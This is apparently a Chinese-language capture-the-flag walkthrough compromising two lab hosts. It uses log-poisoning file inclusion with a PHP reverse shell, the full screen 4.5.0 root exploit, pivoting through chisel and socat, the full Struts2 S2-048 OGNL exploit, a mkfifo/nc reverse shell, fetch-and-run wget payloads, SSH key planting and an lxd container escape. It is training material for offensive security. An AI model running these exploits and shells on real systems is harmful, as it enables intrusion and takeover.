概要
靶机 192.168.8.104
信息收集
$ nmap 192.168.8.103 --min-rate 1000 -sC -sV
结果:
Starting Nmap 7.92 ( https://nmap.org ) at 2024-06-15 05:54 EDT
Nmap scan report for 192.168.8.103 (192.168.8.103)
Host is up (0.035s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_smtp-commands: straylight, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
| ssl-cert: Subject: commonName=straylight
| Subject Alternative Name: DNS:straylight
| Not valid before: 2018-05-12T18:08:02
|_Not valid after: 2028-05-09T18:08:02
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Night City
|_http-server-header: Apache/2.4.25 (Debian)
3000/tcp open hadoop-datanode Apache Hadoop
| http-title: Welcome to ntopng
|_Requested resource was /lua/login.lua?referer=/
|_http-trane-info: Problem with XML parsing of /evox/about
| hadoop-tasktracker-info:
|_ Logs: submit
| hadoop-datanode-info:
|_ Logs: submit
Service Info: Host: straylight
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.39 seconds
我们访问3000端口,发现存在一个ntopng服务
ntopng 是一个高性能的网络监控工具和流量分析平台。它提供了丰富的图形用户界面,用于实时监控网络流量和分析网络行为。ntopng 是 ntop 项目的升级版,具有更强的功能和更高的性能。
username:admin
password:admin
通过默认账密进入后台,发现在80端口还开放了一个目录turing-bolo
http://192.168.8.103//turing-bolo/
把图中三个文件拼接到url
molly.log
armitage.log
riviera.log
http://192.168.8.103//turing-bolo/bolo.php?bolo=molly.log
当我们删除.log后缀后
http://192.168.8.103//turing-bolo/bolo.php?bolo=molly
所以bolo.php会将传入的参数后缀加上.log再进行包含
根据Nmap扫描报告中,发现SMTP服务开启,那么在/var/log中必然存在一个mail.log的日志文件。
http://192.168.8.103//turing-bolo/bolo.php?bolo=/var/log/mail
$ nc -nC 192.168.8.103 25
http://192.168.8.103//turing-bolo/bolo.php?bolo=/var/log/mail
Get Shell
$ nc -lvnp 10032
http://192.168.8.103//turing-bolo/bolo.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.8.107%22%2C10032%29%3Bexec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27&bolo=/var/log/mail
Local.txt 截屏
Local.txt 内容
dainowandiawd
权限提升
$ find / -perm -u=s -type f 2>null
我们搜索权限提升的利用脚本
$ searchsploit screen 4.5.0
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
$ cd /tmp
$ wget http://192.168.8.107/root.sh
$ chmod +x root.sh
$ ./root.sh
Proot.txt 截屏
Proot.txt 内容
dainowandiawd
靶机 192.168.28.4
信息收集
在note.txt中发现了一段描述
Devs,
Lady 3Jane has asked us to create a custom java app on Neuromancer's primary server to help her interact w/ the AI via a web-based GUI.
The engineering team couldn't strss enough how risky that is, opening up a Super AI to remote access on the Freeside network. It is within out internal admin network, but still, it should be off the network completely. For the sake of humanity, user access should only be allowed via the physical console...who knows what this thing can do.
Anyways, we've deployed the war file on tomcat as ordered - located here:
/struts2_2.3.15.1-showcase
It's ready for the devs to customize to her liking...I'm stating the obvious, but make sure to secure this thing.
Regards,
Bob Laugh
Turing Systems Engineer II
管理员似乎添加了一个struts2_2.3.15.1,但似乎存在风险
通过arp发现局域网内还存在其他主机,所以我们需要横向
./chisel server -p 2333 --socks5
./chisel client 192.168.8.103:2333 socks
通过proxychais连接127.0.0.1:1080,这里你可以使用proxychains -h
,来找到配置文件
进行扫描
$ proxychains -f ./internal.conf nmap 192.168.28.4 --min-rate 1000 -Pn
$ proxychains -f ./internal.conf nmap -p 8009,8080 192.168.28.4 -Pn -sC -sV
Get Shell
根据之前文档中提示,访问目录
$ searchsploit struts2
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Just a demo for CVE-2017-9791
import requests
def exploit(url, cmd):
print("[+] command: %s" % cmd)
payload = "%{"
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?(#_memberAccess=#dm):"
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
payload += "(#ognlUtil.getExcludedPackageNames().clear())."
payload += "(#ognlUtil.getExcludedClasses().clear())."
payload += "(#context.setMemberAccess(#dm))))."
payload += "(@java.lang.Runtime@getRuntime().exec('%s'))" % cmd
payload += "}"
data = {
"name": payload,
"age": 20,
"__checkbox_bustedBefore": "true",
"description": 1
}
headers = {
'Referer': 'http://127.0.0.1:8080/2.3.15.1-showcase/integration/editGangster'
}
requests.post(url, data=data, headers=headers)
if __name__ == '__main__':
import sys
if len(sys.argv) != 3:
print("python %s <url> <cmd>" % sys.argv[0])
sys.exit(0)
print('[*] exploit Apache Struts2 S2-048')
url = sys.argv[1]
cmd = sys.argv[2]
exploit(url, cmd)
# $ ncat -v -l -p 4444 &
# $ python exploit_S2-048.py http://127.0.0.1:8080/2.3.15.1-showcase/integration/saveGangster.action "ncat -e /bin/bash 127.0.0.1 4444"
首先我们要在主机B利用socat进行端口转发,在主机B本地监听10034端口,并且将数据转发至Kali机子192.168.8.107:10034
$ socat TCP-LISTEN:10034,fork,reuseaddr TCP:192.168.8.107:10034 &
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.28.3 10034 >/tmp/f
将以上命令保存至 re.sh
(Kali)$ python3 -m http.server 10034
(kali)$ proxychains -f internal.conf python3 exp.py http://192.168.28.4:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "wget http://192.168.28.3:10034/re.sh -O /tmp/re.sh"
(kali)$ nc -lvnp 10034
(kali)$ proxychains -f internal.conf python3 exp.py http://192.168.28.4:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "chmod +x /tmp/re.sh"
(kali)$ proxychains -f internal.conf python3 exp.py http://192.168.28.4:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "sh /tmp/re.sh"
Local.txt 截屏
Local.txt 内容
dwhai1d2
权限提升
由于该连接及其不稳定所以我们通过ssh进行连接
我们尝试在/home命令下,检测写入权限
ta@neuromancer:/home$ for dir in /home/*/; do touch "$dir/1.txt"; done
发现用户:ta可以创建文件
ta@neuromancer:/home$ ssh-keygen
ta@neuromancer:/home$ cat /home/ta/.ssh/id_rsa
ta@neuromancer:~/.ssh$ cat id_rsa.pub >authorized_keys
复制私钥保存到kali,文件名id_rsa
(kali)$ chmod 400 id_rsa
但是对方ssh服务开放在端口34483。
(kali)$ proxychains -f internal.conf ssh -i id_rsa ta@192.168.28.4 -p 34483
我们发现用户ta存在于lxd组,我们可以利用它进行提权
(kali)$ git clone https://github.com/saghul/lxd-alpine-builder.git
(kali)$ cd lxd-alpine-builder
构建包
(kali)$ sudo ./build-alpine
(192.168.8.103)$ socat TCP-LISTEN:10035,fork,reuseaddr TCP:192.168.8.107:10035 &
(kali)$ python3 -m http.server 10035
ta@neuromancer:/tmp$ wget http://192.168.28.3:10035/alpine-v3.20-x86_64-20240613_1112.tar.gz /tmp/alpine-v3.20-x86_64-20240613_1112.tar.gz
ta@neuromancer:/tmp$ lxc image import /tmp/alpine-v3.20-x86_64-20240613_1112.tar.gz --alias test
ta@neuromancer:/tmp$ lxc image list
ta@neuromancer:/tmp$ lxc init test ignite -c security.privileged=true
lxc init myimage ignite:初始化一个名为 ignite 的容器,基于 myimage 镜像。
-c security.privileged=true:配置容器为特权容器。这意味着容器中的进程将以 root 权限运行,并且可能直接访问宿主机的设备和文件系统。
ta@neuromancer:/tmp$ lxc config device add ignite test disk source=/ path=/mnt/root recursive=true
选择 /mnt/root 作为挂载点是为了确保挂载操作安全、明确和无冲突。通过这种方式,你能够在容器内方便地访问和操作宿主机的文件系统,从而实现提权操作。
lxc config device add ignite mydevice disk:向 ignite 容器添加一个名为 mydevice 的设备,类型为 disk。
source=/:指定宿主机的根目录 / 作为源目录。
path=/mnt/root:在容器内将该目录挂载到 /mnt/root。
recursive=true:递归挂载,包含子目录。
$ lxc start ignite
$ lxc exec ignite /bin/sh
成功逃逸
Proot.txt 截屏
Local.txt 内容
diwoinwad